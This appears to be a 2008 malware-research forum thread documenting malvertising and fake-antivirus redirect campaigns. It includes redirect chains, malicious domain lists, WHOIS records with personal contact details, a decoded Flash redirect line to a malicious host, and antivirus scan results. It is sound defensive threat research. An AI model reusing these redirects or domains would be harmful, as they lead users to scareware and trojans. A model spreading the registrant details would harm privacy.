B.I.S.S. Forums > Flash Mystery

Help - Search - Members - Calendar

Full Version: Flash Mystery

B.I.S.S. Forums > Malware Research Forum > Malware Playground

Pages: 1, 2, 3, 4, 5, 6

Kimberly

Dec 10 2008, 04:53 PM

<h4>

WARNING: Sell Your Home

</h4>
A new malvertizement featuring Sell Your Home has been discovered by Sandi.

Banner.

Campaign.

2layerads.net/_stat.gif?src=[*]

<h4>

www.variety.com

</h4>
Caution is advised when visiting www.variety.com due to the possible presence of a malicious banner. The site being under Microsoft-IIS/6.0 a hacked .htaccess file is excluded.
Reference: http://www.google.com/support/forum/p/Webm...6b298&hl=en

proweb-info.com was first spotted on Dec 7 2008 and is currently redirecting to pro-antivirus-scan.com/2009/1/en/freescan.php?id=[*]
______________________________

pro-antivirus-scan.com - 91.203.93.68

IP Location - Ukraine - Pool For Co-location Customers
Updated Date: 09-dec-2008
Creation Date: 05-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.FREEYOURDNS.COM
Name Server: NS2.FREEYOURDNS.COM
Name Server: NS3.FREEYOURDNS.COM

Registrant Contact: Aleksander Kabak onicdomains@yahoo.com
+380935437698 fax: +380935437698
Krasnoarmeiskay 83-34
Kharkov Kharkov 61002
ua

Kimberly

Dec 11 2008, 06:18 AM

<h4>

The FTC goes after Innovative Marketing

</h4>
Press release

At the request of the Federal Trade Commission, a U.S. district court has issued a temporary halt to a massive “scareware” scheme, which falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. According to the FTC, the scheme has tricked more than one million consumers into buying computer security products such as WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus. The court also froze the assets of those responsible for the scheme, to preserve the possibility of providing consumers with monetary redress.

According to the FTC’s complaint, the defendants used an elaborate ruse that duped Internet advertising networks and popular Web sites into carrying their advertisements. The defendants falsely claimed that they were placing Internet advertisements on behalf of legitimate companies and organizations. But due to hidden programming code that the defendants inserted into the advertisements, consumers who visited Web sites where these ads were placed did not receive them. Instead, consumers received exploitive advertisements that took them to one of the defendants’ Web sites. These sites would then claim to scan the consumers’ computers for security and privacy issues. The “scans” would find a host of purported problems with the consumers’ computers and urge them to buy the defendants’ computer security products for $39.95 or more. However, the scans were entirely false.

According to the complaint, the two companies charged in the case – Innovative Marketing, Inc. and ByteHosting Internet Services, LLC – operate using a variety of aliases and maintain offices in various countries. Innovative Marketing is a company incorporated in Belize that maintains offices in Kiev, Ukraine. ByteHosting Internet Services is based in Cincinnati, Ohio.

The complaint alleges that these two companies, along with individuals Daniel Sundin, Sam Jain, Marc D’Souza, Kristy Ross, and James Reno, violated the FTC Act by misrepresenting that they conducted scans of consumers’ computers and detected a variety of security or privacy issues, including viruses, spyware, system errors, and pornography. The complaint also names a sixth individual, Maurice D’Souza, as a relief defendant who received proceeds from the scheme.

On December 2, 2008 the FTC requested and received a temporary restraining order from the U.S. District Court for the District of Maryland. Under its terms, the defendants are barred from falsely representing that they have run any type of computer analysis, or that they have detected security or privacy problems on a consumer’s computer. They also are barred from using domain names obtained with false or incomplete information, placing advertisements purportedly on behalf of a third party without that party’s consent, or otherwise attempting to conceal their own identities. The order also mandates that companies hosting the defendants’ Web sites and providing domain-registration services take the necessary steps to keep consumers from accessing these Web sites.

The FTC seeks to permanently bar the defendants from engaging in “scareware” marketing. The FTC also asks the court to order the defendants to provide monetary redress to consumers or otherwise give up their ill-gotten gains.

As part of an ongoing effort to warn the public about the risks posed by scareware and other types of Internet fraud, the FTC has produced a new alert for consumers. To learn more, see the alert “‘Free Security Scan’ Could Cost Time and Money ” at http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt121.shtm.

The Commission vote authorizing the staff to file the complaint against the defendants was 4-0. The complaint was filed on December 2, 2008 in the U.S. District Court for the District of Maryland.

NOTE: The Commission authorizes the filing of a complaint when it has “reason to believe” that the law has been or is being violated, and it appears to the Commission that a proceeding is in the public interest. A complaint is not a finding or ruling that the defendants have actually violated the law.

Complaint here.

FTC Consumer Alert: “Free Security Scan”Could Cost Time and Money"

Kimberly

Dec 11 2008, 07:12 PM

<h4>

WARNING: Best Western

</h4>
A new malvertizement featuring Best Western has been discovered by Sandi - Full details.

Banner.

Campaign.

ab-outstat.net/c/index.php?id=[*]
profitabill.com/?cmpid=[*]
onlinestatsmanager.com/ts/in.cgi?[*]
www.system-scanner.org/l2/index.html?ref_id=[*]

Kimberly

Dec 12 2008, 06:29 AM

<h4>

www.nobitching.com : .htaccess hack

</h4>
While usually we saw IP's being used in the redirects involving hacked .htaccess files, I ran into a stranger one today. Visiting www.nobitching.com from Google trigged the following redirect:

alamaat.com/video/wmv.php?f=[*]&p=[*]
trusted-liveclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
antivirus-rapid-scanner.com/360/1/freescan.php?nu=[*]

It's yet unclear if alamaat.com has been a victim itself or not of hacking, if they created that link on purpose or not.
______________________________

alamaat.com - 84.45.20.113

IP Location - United Kingdom - Freezone-net
Updated Date: 14-feb-2008
Creation Date: 09-feb-2007
Registrar: ENOM, INC.
Name Server: NS0.FREEZONE.CO.UK
Name Server: NS1.FREEZONE.CO.UK
Administrative Contact:
alamaat.com
usman ahmed (usman438@yahoo.com)
+92.3218484830
Fax: none
180-j johar town
lahore, pu 54500
PK
______________________________

trusted-liveclicks.com - 78.46.101.234

IP Location - Germany - Hetzner
Updated Date: 10-dec-2008
Creation Date: 05-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Aleksander Kabak onicdomains@yahoo.com
+380935437698 fax: +380935437698
Krasnoarmeiskay 83-34
Kharkov Kharkov 61002
ua
______________________________

antivirus-rapid-scanner.com - 91.203.93.68

IP Location - Ukraine - Pool For Co-location Customers
Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua

Kimberly

Dec 13 2008, 06:35 PM

<h4>

www.startribune.com

</h4>
Redirects have been reported at StarTribune, the last one a couple of hours ago. Extreme caution is advised upon visiting the site.

<h4>

noway-clicks.com - protection-fast-scanner.com - protected-clicks-system.com - protectionfastscanner.com

</h4>

noway-clicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
protection-fast-scanner.com/360/1/en/freescan.php?sid=[*]

protected-clicks-system.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
protection-fast-scanner.com/360/1/en/freescan.php?sid=[*]

noway-clicks.com - 69.10.49.195

Innovation IT Solutions Corp
Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua
______________________________

protection-fast-scanner.com - 64.20.38.90 / 69.10.44.207

Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM
______________________________

protected-clicks-system.com - 78.46.101.234

Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua
______________________________

protectionfastscanner.com - 78.47.248.118 / 78.159.114.116 / 78.159.118.144 / 94.247.2.11 / 94.247.2.231

Updated Date: 10-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Konovalov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Sovetskay 98-56
Kharkov Kharkov 61003
ua

<h4>

Name Servers

</h4>
Seeing NS1.MANAGEHOSTDNS.COM & co reminds me of the formal managedns1.estboxes.com, managedns2.estboxes.com ... don't ask me why.

NS1.MANAGEHOSTDNS.COM - 94.247.2.225 - AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd.
NS2.MANAGEHOSTDNS.COM - 91.203.92.47 - AS44997 BTG12-AS UATELECOM LLC
NS3.MANAGEHOSTDNS.COM - 64.86.17.44 - AS30407 VELCOM .com

managehostdns.com

Updated Date: 11-dec-2008
Creation Date: 09-dec-2008
Registrar: BIZCN.COM, INC.

Registrant Contact:
Privat person
Vladimir Loginov onicdomains@yahoo.com
+380935439965 fax: +380935439965
Kosmonavtov 19-34
Kharkov Kharkov 61003
ua

ns1.freeyourdns.com 213.180.204.8 AS13238 Yandex LLC
ns2.freeyourdns.com 91.203.92.47 - AS44997 BTG12-AS UATELECOM LLC
ns3.freeyourdns.com 64.86.17.44 - AS30407 VELCOM .com
______________________________

ns1.managehostdns.com

hostnames sharing ip with a-records

hs.2-225.zlkon.lv

domains using this as nameserver

protectionfastscanner.com

ns2.managehostdns.com

hostnames sharing ip with a-records

advancedscanner.com
liveupdateservice.cn
ns1.freefastdns.com
ns1.mysecuritysupport.com
ns2.freeyourdns.com
protectiononlineinfo.com
travelmaxinside.cn

domains using this as nameserver

advanced-scan.com
advancedproscan.com
advancedscanner.com
anti-virusquickscan.com
anti-virusrapid-scanner.com
antivirus-pro-scanner.com
antivirus-rapid-scanner.com
antivirus360-protection.com
antivirusbestscanner.com
antivirusfastscan.com
antivirusrapid-scanner.com
bonus-protection.com
bulkwatcher.com
clicksoverview.com
computerquickscanner.com
defence-live-scan.com
digipayments-soft.com
freeyourdns.com
full-pc-scan.com
globalskytransfer.com
infoclicknow.com
informationgohere.com
infowwwpro.com
litetds.info
live-secutiry-update.com
livepc-update.com
ltraffic.cc
managehostdns.com
official-antivirus2009.com
online-info-clicks.com
orbitalclicks.com
overviewclicks.com
paymentdetalization.com
pc-defence-update.com
privateinfoclick.com
privatewebsphere.com
pro-anti-virus-scan.com
pro-antivirus-scan.com
pro-antivirusscanner.com
proinfowww.com
prooverview.com
protection-freescan.com
protection-live-update.com
protectionfastscanner.com
protectionquickscan.com
protectionsoftwaredownload.com
protectmypcnow1.com
proweb-info.com
quickscanpc.com
realtimeweb1.com
safeinternetzone.com
securedclickhere.com
secureddownloadserver.com
securedsoftwaredownload.com
securedupdatedownloads.com
secureupdateserver.com
securityfullscan.com
slickoverview.com
software-clicks.com
softwareclicks2.com
softwareclicks3.com
supportdeska.com
systemmailsupport.com
tdsdefence.info
total-antivirus-scan.com
transferallsource.com
trustedlive-clicks.com
trustedpurchasing.com
updateyourprotection.com
viewallclicks.com
viewyourclicks.com
windowslovingyou.com
winupdates-server.com
world-click-service.com
world-web-info.com
world-web-service.com
wwwinfoclick.com
xpsoftupgrade.com

ns3.managehostdns.com

hostnames sharing ip with a-records

ns2.freefastdns.com
ns3.freeyourdns.com
webscannertools.com

domains using this as nameserver

freeyourdns.com
and see ns2.managehostdns.com

Kimberly

Dec 14 2008, 12:03 AM

<h4>

WARNING: www.startribune.com - ETRADE

</h4>
Earlier today I did mention the presence of a malicious banner on www.startribune.com. The malvertizement in question features Etrade (which we did encounter in the past). Both the 300x250 and 728x90 version are being displayed.

Screenshot in situ with the 728x90 version.

Banner.

adserver.adtechde.net/adiframe|3.0|24|57983741|4|1|ADTECH;loc=700;grp=sttr/ETrade_728x90.swf

adserver.adtechde.net/adiframe|3.0|24|57983741|4|1|ADTECH;loc=700;grp=sttr/ETrade_300x250.swf

Campaign.

adclickmate.net/_stat.gif?src=[*]

Both campaigns carry the same link. The 300x250 version was the first being displayed. We notice a request at DoubleClick advertsing to adserver.adtechde.net. The "construction of the URL" reminds us of the malvertizement spotted on Fox News Nov 15 2008.

At adserver.adtechde.net we are redirected to adserver.adtechde.net/.../sttretrade300.html. That page contains some very interesting elements and it proves us again that the bad guys are lazy but in despite get away with about anything.

Etrade advertisement, with a www.imin.com clicktag and a biotrainer ID added to the fact that our cookie on the PC states adserver.adtechie.net ... No doubt possible, we are in presence of the same guys who did set up adserver.adtechie.net - Ref here and here. I can't stress enough ... an in depth investigation is required when accepting advertisements from unknown and/or new sources ! As seen above, no one is immune.

A closer look at the malicious banners reveals the use of dynamic text. No FuseKit here, but random named similar procedures in order to decode the obfuscated URL.

<h4>

IP details

</h4>
adserver.adtechde.net - 84.16.229.240

Updated Date: 20-nov-2008
Creation Date: 18-nov-2008 <--- 3 days after we did discover adserver.adtechie.net
Domain Name: ADTECHDE.NET
Registrar: INTERNET.BS CORP.
Name Server: NS1.ADTECHDE.NET
Name Server: NS2.ADTECHDE.NET

Registrant
Private Whois Service
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o adtechde.net
N4892 Nassau
Bahamas

Administrative Contact
Private Whois Service
Private Whois Service yys5yve49230f22939d0@d6utpmt4922b61034d0c.privatewhois.net
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o adtechde.net
N4892 Nassau
Bahamas
Tel: +1.23456789
______________________________

adclickmate.net - 212.95.37.133

Updated Date: 21-nov-2008
Creation Date: 24-mar-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.ADCLICKMATE.NET
Name Server: NS2.ADCLICKMATE.NET

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Kimberly

Dec 14 2008, 01:27 AM

<h4>

WARNING: Sell Your Home

</h4>
Another malvertizement featuring Sell Your Home aka International Listings - www.intlistings.com - distributed by adserver.adtechde.net

Banner.

adserver.adtechde.net/adiframe|3.0|125|67983747|4|1|ADTECH;loc=700;grp=oni/onintlist728x90.swf

Campaign.

adclickmate.net/_stat.gif?src=[*]

Kimberly

Dec 14 2008, 10:32 PM

<h4>

[center]The ai&key to success

[/center]</h4>
Subject: Servedad
Danger level: high - 100%
Appearances:

Sep 15 2008 - www.cnbc.com
Sep 24 2008 - spaces.live.com

Dec 8 2008 - encarta.msn.com

Last seen: Treat all content from Servedad with extreme caution
Servedad status: ... ACTIVE ...
______________________________

4 malvertizements, 4 identical "campaigns" except for 1 parameter ... the ai&key - besides some differences in the code to prevent detection but that's off topic in the current analysis.

statscontroller.net/stat.gif?url=http://..../ads/bid=..../.../.../.../ai&key=[snapped by me]

After quickly analysing these malvertizements what stood out was the date of the last ones ... Sept 16 2008 - or 092208/new in the URL if you prefere ... a very short delay after the first one was "busted".

Kimberly

Dec 15 2008, 05:31 PM

<h4>

772983.2009dengi.com - movie.swf

</h4>
Another social engineering trick involving Flash. A gif image mimics a player, hovering over the image shows us a link to movie.swf

Clicking on the image in order to load the "so called" movie, brings us to Antivirus 360.

The analysis of movie.swf reveals the use of getURL, JavaScript and Escaped text.

Decoded:

CODE
window.location = "//m08b.com/in.cgi?default";

Redirects.

m08b.com/in.cgi?default
protectedgoclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
antivirus-online-proscan.com/360/1/en/freescan.php?sid=[*]

BTW ... If you refrained yourself from clicking on the movie, dont follow on the links further down on the same page either, they redirect to random generated URL's and from there back to m08b.com. Another redirect at m08b.com will lead the victim to another fake Player. This time clicking will trigger the download of a fake codec.

File TubePlayer_1_.ver.6.exe received on 12.15.2008 20:15:00 (CET)

Result: 2/38 (5.27%)

Microsoft 1.4205 2008.12.15 TrojanDownloader:Win32/Renos.FH
Symantec 10 2008.12.15 Downloader

File size: 49156 bytes
MD5...: 61d02d92f3d125051bb91affcff18a6d
SHA1..: 2972fb29ea425bf996fdc6aa4bfd4f2498dc3f41

<h4>

IP details

</h4>
772983.2009dengi.com - 64.27.5.44

IP Location - California - Los Angeles - Airlinereservations.com Inc
Updated Date: 10-dec-2008
Creation Date: 10-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU

Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955140574

Registrant: PrivacyProtect.org
______________________________

m08b.com - 84.16.251.238

Updated Date: 28-sep-2008
Creation Date: 30-jul-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.M08B.COM
Name Server: NS2.M08B.COM

Registrant: Balabass LTD
Max Maximus (balabass@gmail.com)
Pohoronnaya str. 5
Purgen
0,630862
IN
Tel. +383.55379375
______________________________

protectedgoclicks.com - 89.149.197.248

IP Location - Germany - Netdirekt E.k
Updated Date: 14-dec-2008
Creation Date: 14-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Pavel Kovalev - tvdomains@lycos.com
+74956541623 fax: +74956541623
ul. Sadovay 17-32
Moskva Moskovskay oblast 114365
ru
______________________________

antivirus-online-proscan.com - 89.149.197.248

IP Location - Germany - Netdirekt E.k
Updated Date: 14-dec-2008
Creation Date: 14-dec-2008
Registrar: BIZCN.COM, INC.
Name Server: NS1.MANAGEHOSTDNS.COM
Name Server: NS2.MANAGEHOSTDNS.COM
Name Server: NS3.MANAGEHOSTDNS.COM

Registrant Contact: Oleg Sobolev tvdomains@lycos.com
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru
______________________________

mybestpov-tube.com - 69.59.21.247

Updated Date: 12-dec-2008
Creation Date: 12-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.MYBESTPOV-TUBE.COM
Name Server: NS2.MYBESTPOV-TUBE.COM

Registrant: Washington Robin
Email: robinwfwatkins@gmail.com
Organization: Private person
Address: 4695 Monroe Avenue
City: Palmetto
State: PA
ZIP: 34221
Country: US
Phone: +7.9417220595
______________________________

downloadallsoftnow.com - 94.247.3.228

Updated Date: 12-dec-2008
Creation Date: 12-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.DOWNLOADALLSOFTNOW.COM
Name Server: NS2.DOWNLOADALLSOFTNOW.COM

Registrant: Washington Robin
Email: robinwfwatkins@gmail.com
Organization: Private person
Address: 4695 Monroe Avenue
City: Palmetto
State: PA
ZIP: 34221
Country: US
Phone: +7.9417220595

Kimberly

Dec 18 2008, 05:15 AM

<h4>

security-www-clicks.com - proantivirusscanner.com - powerantivirusscan.com

</h4>

protected-clicks-system.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
proantivirusscanner.com/2009/1/en/freescan.php?id=[*]

security-www-clicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
powerantivirusscan.com/360/1/en/freescan.php?sid=[*]

Kimberly

Dec 19 2008, 06:25 PM

<h4>

delightfullinternet.com - onlinevirusbuster.com

</h4>
Today I want to draw your attention on another method used to redirect people to fake online scanners - Antivirus 360 or Antivirus 2009 for the time being - which has been going on for quite a while. Search engines are used on a daily basis by everyone, whether it is to find a particular website, information or assistance with common problems. Keywords are the basis to obtain results and the bad guys have been using common key words / sentences to set up a couple of pages of their own sauce.

Illustration.

A person is having problems with his mail account, it refuses to download attachments. A typical query would be Attachment Problems Yahoo Mail for example. The search engine will return its results, people will start reading pages and once in a while you will see a couple of links simply containing words, strange domain names as seen below.

Note: the 2 last domains are not resolving at the time of the write up

Clicking on the link will initiate a redirect. This method has nothing in common with the hacked .htaccess files although it produces the same result. To understand how it works we need to examine our referrer header. You will notice it carries our keywords, represented by the q= parameter

www.google.com/search?hl=en&lr=&as_qdr=w&q=Attachment+Problems+Yahoo+Mail&start=10&sa=N

Upon entering m2areas.com.br (or another similar website) this field is examined and if not empty, we encounter a 302 error which bumps us to the fake online scanner.

Complete redirect.
m2areas.com.br/ejcto/nyabt/attachments/attachments.htm
onlinecounter2.net/s/in.cgi?[*]
onlinecounter2.net/redirect/
delightfullinternet.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
onlinevirusbuster.com/2009/1/freescan.php?nu=[*]
onlinevirusbuster.com/2009/1/en/freescan.php?id=[*]

If the q parameter is empty or when you visit directly the page, no redirect does occur.

The page itself is only a succession of key phrases, common used search terms. Indexed by search engines they will stand out in queries.

Either block your referrer headers or take the time to copy and paste links in a new tab is about the only solution you have against these hijacks. Don’t blindly follow any link returned by your query, examine its content and look at the website address you will be visiting when following the link.

<h4>

IP details

</h4>
onlinecounter2.net - 92.48.201.39

Name Servers: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Updated Date: 01-dec-2008
Creation Date: 02-oct-2008

Registration Service Provided By: NKVD.PRO
Contact: +7.9265552367

Registrant: Viktor K Bratikov (viktorbratikov@gmail.com)
ul.Gospitalnyj val, 5/6, 165
Moscow
Moskovskaya oblast,105094
RU
Tel. +7.9039908132
______________________________

delightfullinternet.com - 89.149.227.196

Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
Creation Date: 16-dec-2008
Registrar: BIZCN.COM, INC.

Registrant Contact: Sergey Loginov tvdomains@lycos.com
+74956743562 fax: +74956743562
Krasnoarmeiskay 83-34
Moskva Moskovskay oblast 107234
ru
______________________________

onlinevirusbuster.com - 89.149.227.196

Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
Creation Date: 14-dec-2008
Registrar: BIZCN.COM, INC.

Registrant Contact: Oleg Sobolev tvdomains@lycos.com
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru

Kimberly

Dec 22 2008, 12:35 AM

<h4>

YouTube ...

</h4>

A couple of weeks ago a false positive on YouTube video clips has freaked out Internet. Several people got an alert from their antivirus software saying it detected a virus called Actns/Swif.T
Being a false positive, panic over right? Well no … actually you should be very afraid. The video format used by Youtube is Flash.

l.swf - which acts as a container to load the videos - uses the built in _url variable. This feature makes it possible for the SWF to change its behavior depending on where it is ran from. That's why it got flagged by the antivirus software by the way. Furthermore the action script uses System.security.allowDomain("*").

[attachmentid=881]

The uploaded user video files are processed and a Flash file is generated. It’s unlikely that Youtube would host malicious files on purpose but with the increasing amount of videos being posted all over the web - especially on blogs and social networking sites such as MySpace and Facebook - the real question is who can you trust?
A quick Google search reveals that thousands of video files are posted every day and I doubt Youtube is actually able to check every file for malicious links before letting them go public. We saw in the past that the bad guys are resourceful when it comes to obfuscate their malicious code and few tools are able to detect such code.

Kimberly

Dec 23 2008, 10:41 PM

<h4>

00119922.com - Search engine flood or how to take advantage of SEO

</h4>
In the past months we saw different tricks to get those fake scanners aka scareware on your computer. A couple of days ago we detailed an example where the search engine was exploited to redirect people to those same fake online scanners and trick them into the install of Antivirus 360 / 2009 using popular expressions - Reference.
This time an unknown hacker went a step futher and performed some SEO (Search Engine Optimization) to flood search engines, using a unique domain : 00119922.com

Full Story: More than 1 Million Ways to Infect Your Computer

Any link containing microsoft.com will be handeled by MS servers and redirect the user to Live Search.

Other links trigger will a full redirect to the scan engine.

Redirects.
00119922.com/in.php?&n=[*]&t=[keywords]
hitstransfer.com/in.php?land=[*]&affid=[*]
netsecuritybureau.com/scan/index.php?affid=[*]
netsecuritybureau.com/downloadsetupws.php?affid=[*]

<h4>

IP details

</h4>

00119922.com - 87.248.163.58

Updated Date: 19-dec-2008
Creation Date: 19-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS3.MY2NS.NET - NS4.MY2NS.NET
Registrant: PrivacyProtect.org
______________________________

hitstransfer.com - 91.211.64.31

Updated Date: 20-dec-2008
Creation Date: 20-dec-2008
Registrar: REGTIME LTD
Name Server: NS1.HITSTRANSFER.COM - NS2.HITSTRANSFER.COM

Registrant: Robert Ward
Email: robertmwards@gmail.com
Organization: Private person
Address: 1595 Stoney Lane
City: Carrollton
State: TX
ZIP: 75006
Country: US
Phone: +1.9729044211
______________________________

netsecuritybureau.com - 91.211.64.31

Updated Date: 20-dec-2008
Creation Date: 20-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.NETSECURITYBUREAU.COM - NS2.NETSECURITYBUREAU.COM

Registrant: Robert Ward
Email: robertmwards@gmail.com
Organization: Private person
Address: 1595 Stoney Lane
City: Carrollton
State: TX
ZIP: 75006
Country: US
Phone: +1.9729044211
______________________________

Why am I not surprised at all when the name Directi, REGTIME LTD and PrivacyProtect pops up as usual.

<h4>

install.exe - ws.zip

</h4>
install.exe

File install.exe received on 12.24.2008 00:37:00
AhnLab-V3 2008.12.22.0 2008.12.23 -
AntiVir 7.9.0.45 2008.12.23 -
Authentium 5.1.0.4 2008.12.23 -
Avast 4.8.1281.0 2008.12.23 -
AVG 8.0.0.199 2008.12.23 -
BitDefender 7.2 2008.12.24 -
CAT-QuickHeal 10.00 2008.12.23 -
ClamAV 0.94.1 2008.12.23 -
Comodo 804 2008.12.23 -
DrWeb 4.44.0.09170 2008.12.24 -
eSafe 7.0.17.0 2008.12.23 Suspicious File
eTrust-Vet 31.6.6275 2008.12.23 -
Ewido 4.0 2008.12.23 -
F-Prot 4.4.4.56 2008.12.23 -
F-Secure 8.0.14332.0 2008.12.24 -
Fortinet 3.117.0.0 2008.12.24 -
GData 19 2008.12.24 -
Ikarus T3.1.1.45.0 2008.12.23 Trojan-Downloader.Win32.Delf
K7AntiVirus 7.10.563 2008.12.23 -
Kaspersky 7.0.0.125 2008.12.23 -
McAfee 5473 2008.12.23 -
McAfee+Artemis 5473 2008.12.23 Generic!Artemis
Microsoft 1.4205 2008.12.24 -
NOD32 3714 2008.12.23 -
Norman 5.80.02 2008.12.23 -
Panda 9.0.0.4 2008.12.23 Suspicious file
PCTools 4.4.2.0 2008.12.23 -
Prevx1 V2 2008.12.24 Malicious Software
Rising 21.09.14.00 2008.12.23 -
SecureWeb-Gateway 6.7.6 2008.12.24 -
Sophos 4.37.0 2008.12.23 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2008.12.24 -
TheHacker 6.3.1.4.199 2008.12.23 -
TrendMicro 8.700.0.1004 2008.12.23 PAK_Generic.001
VBA32 3.12.8.10 2008.12.23 -
ViRobot 2008.12.23.1532 2008.12.23 -
VirusBuster 4.5.11.0 2008.12.23 -

Additional information
File size: 62505 bytes
MD5...: 2bd950fdb5770ce6a1567f162dfa2679
SHA1..: a9fdc0544605c94f1ea6040935e0ef0811eade32
SHA256: 30b669b1cfb140c58ad5fce6a75a47322bbf6f8505bf74dff29e4d49dd0ca771

Installer needs to download additional components.

ws.zip

File ws.zip received on 12.24.2008 00:49:33 (CET)
AhnLab-V3 2008.12.22.0 2008.12.24 -
AntiVir 7.9.0.45 2008.12.23 -
Authentium 5.1.0.4 2008.12.23 -
Avast 4.8.1281.0 2008.12.23 -
AVG 8.0.0.199 2008.12.23 -
BitDefender 7.2 2008.12.24 -
CAT-QuickHeal 10.00 2008.12.23 -
ClamAV 0.94.1 2008.12.23 -
Comodo 804 2008.12.23 -
DrWeb 4.44.0.09170 2008.12.24 -
eSafe 7.0.17.0 2008.12.23 -
eTrust-Vet 31.6.6275 2008.12.23 -
Ewido 4.0 2008.12.23 -
F-Prot 4.4.4.56 2008.12.23 -
F-Secure 8.0.14332.0 2008.12.24 -
Fortinet 3.117.0.0 2008.12.24 -
GData 19 2008.12.24 -
Ikarus T3.1.1.45.0 2008.12.23 -
K7AntiVirus 7.10.563 2008.12.23 -
Kaspersky 7.0.0.125 2008.12.24 Trojan.Win32.Agent.azgp
McAfee 5473 2008.12.23 -
McAfee+Artemis 5473 2008.12.23 -
Microsoft 1.4205 2008.12.24 -
NOD32 3714 2008.12.23 Win32/Adware.WinWebSecurity
Norman 5.80.02 2008.12.23 -
Panda 9.0.0.4 2008.12.23 -
PCTools 4.4.2.0 2008.12.23 -
Prevx1 V2 2008.12.24 -
Rising 21.09.14.00 2008.12.23 -
SecureWeb-Gateway 6.7.6 2008.12.24 -
Sophos 4.37.0 2008.12.24 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2008.12.24 -
TheHacker 6.3.1.4.199 2008.12.23 -
TrendMicro 8.700.0.1004 2008.12.23 -
VBA32 3.12.8.10 2008.12.23 -
ViRobot 2008.12.23.1532 2008.12.23 -
VirusBuster 4.5.11.0 2008.12.23 -

Additional information
File size: 896784 bytes
MD5...: ba42c570adc9d23461dd9f1110679440
SHA1..: 458b41185c078b935c96615236f025d4914830f6
SHA256: 2c3f6a05ba850e831feb9c5d61d6944c8661fb128f0e903552aad992fcadeaf9

Kimberly

Dec 24 2008, 05:25 PM

<h4>

ashoping.com

</h4>
winSexZGcy3vILV.exe

File size: 62464 bytes
MD5...: 52d361374317c32b55958f9ba78b506b
SHA1..: 2fcbc381e432ea2eae4ea3c42097d0f75a76aa13
